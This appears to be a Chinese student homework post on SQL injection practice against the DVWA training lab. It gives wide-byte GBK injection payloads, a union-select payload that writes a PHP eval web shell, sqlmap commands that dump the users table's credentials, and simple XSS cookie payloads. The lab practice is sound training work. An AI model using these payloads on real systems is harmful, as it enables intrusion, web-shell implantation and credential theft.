当前位置: 首页 > article >正文

网络安全【C10-2024.10.1】-sql注入基础

1、利用宽字节注入实现“库名-表名”的注入过程,写清楚注入步骤;

复制代码

宽字节概念
1、如果一个字符的大小是一个字节的,称为窄字节;
2、如果一个字符的大小是两个及以上字节的,称为宽字节;像GB2312、GBK、GB18030、BIG5、Shift_JIS等编码都是常见的宽字节字符集。英文默认占一个字节,中文占两个字节。

宽字节注入原理
宽字节注入利用MySQL的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字。

注入过程变化举例:
%df%27 ===> addslashes函数 ===> %df%5c%27 ===> 数据库GBK ===> 運'

kobe   #正常查询
kobe' or 1=1 #尝试一般性kobe%df' or 1=1 #注入
kobe%df\' or 1=1 #转义防护下的提交:kobe%df%5c%27 or 1=1 #

kobe%df' or 1=1 #burpsuite 拦截删除5c,    百分号转换为%25,斜杠转换为%5c,单引号转换后%27

burpsuite 拦截修改提交:
name=kobe%25df%27+or+1%3D1+%23&submit=%E6%9F%A5%E8%AF%A2  ---> name=kobe%df%27+or+1%3D1+%23&submit=%E6%9F%A5%E8%AF%A2

后端补充%5c将变成:kobe%df%5c%27 or 1=1 # 在为GBK编码 df 5c 運,所以后端真正提交的是kobe運'or 1=1 #

https://blog.csdn.net/qwq1503/article/details/125664874  GBK汉字编码表

复制代码

2、利用SQL注入实现DVWA站点的Getshell,写清楚攻击步骤;

复制代码

select 1,2 into outfile
-1' union select 1,"<?php eval($_POST['a']);?>" into outfile '/var/www/html/shell2.php

http://192.168.101.41:8080/shell2.php

复制代码

3、使用Sqlmap工具完成对DVWA数据库的注入过程,要求按照库、表、列、内容的顺序进行注入;

python sqlmap.py -u "http://192.168.101.41:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -cookie="PHPSESSID=ajfoa0upur9v2v9tbcipc5lte7; security=low" --batch --dbs

python sqlmap.py -u "http://192.168.101.41:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -cookie="PHPSESSID=ajfoa0upur9v2v9tbcipc5lte7; security=low" --batch -D "dvwa" -tables

python sqlmap.py -u "http://192.168.101.41:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -cookie="PHPSESSID=ajfoa0upur9v2v9tbcipc5lte7; security=low" --batch -D "dvwa" -T "users" --columns

python sqlmap.py -u "http://192.168.101.41:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -cookie="PHPSESSID=ajfoa0upur9v2v9tbcipc5lte7; security=low" --batch -D "dvwa" -T "users" -C user,password --dump

--batch 命令来自动答复和判断
--tables 枚举的DBMS数据库中的表
--columns 枚举DBMS数据库表列
--dump 转储数据库表项,即下载
-u URL 目标URL
-D DB 要进行枚举的指定数据库名
-T TBL DBMS数据库表枚举
-C COL DBMS数据库表列枚举

4、完成DVWA靶场存储型XSS的漏洞练习。

xss也是一种注入,是一种跨站脚本注入
XSS的三种类型与区分
1.反射性
也就是通过让用户点击事先准备好的URL,之后保存用户的cookie,之后用用户的cookie去登陆了网站,事先xss攻击
<script>alert(document.cookie);</script>

2.存储型
会把用户输入的数据存储在服务器端中,这种xss攻击可以持久化,并且更加稳定。

代码已经被内嵌进去了,最大的好处:就在于攻击者不需要和用户交互

3.DOM型xss
HTML DOM定义了访问和操作HTML文档的标准方法。意思就是修改html的文档代码,在你打开文档的时候,就会自动执行代码中的内容,其本质和反射型是一样的。


http://www.kler.cn/a/468935.html

相关文章:

  • 51单片机(二)中断系统与外部中断实验
  • salesforce 可以为同一个简档的同一个 recordtype 的对象设置多种页面布局吗
  • macOS 安装 python3.11
  • 微信小程序Uniapp
  • 2023最新版IDEA创建一个SpringBoot项目 (详细教程)
  • Python入门教程 —— 模块和包
  • Oracle DG备库数据文件损坏修复方法(ORA-01578/ORA-01110)
  • 【人工智能数据科学与数据处理】——深入详解大数据与数据库技术之非关系型数据库:MongoDB 的关键概念、核心原理、示例及主要应用
  • 使用Python构建智能医疗诊断系统
  • 解决sublime编译无法输入问题
  • PDF2Audio - 阅读 PDF 的新方式
  • 【工具整理】WIN换MAC机器使用工具整理
  • vue数据请求通用方案:axios的options都有哪些值
  • 《计算机网络A》单选题(详解)
  • 2、蓝牙打印机点灯-GPIO输出控制
  • AdaBoost算法详解与PyTorch实现
  • STM32CUBEMX+PLS_D1000激光测距模块+MT6701角度传感器,获取三角形第三边长度
  • 国内Ubuntu环境Docker部署 SenseVoice
  • Vue动态控制disabled属性
  • 基于单片机的肺功能MVV简单测算
  • Go语言的 的同步与异步编程(Synchronization Asynchronous Programming)基础知识
  • 聊聊 C# 中的委托
  • 数据库系统概论期末复习
  • 资金管理系统——python
  • iOS 逆向学习 - iOS Architecture Core OS Layer
  • pytorch索引操作函数介绍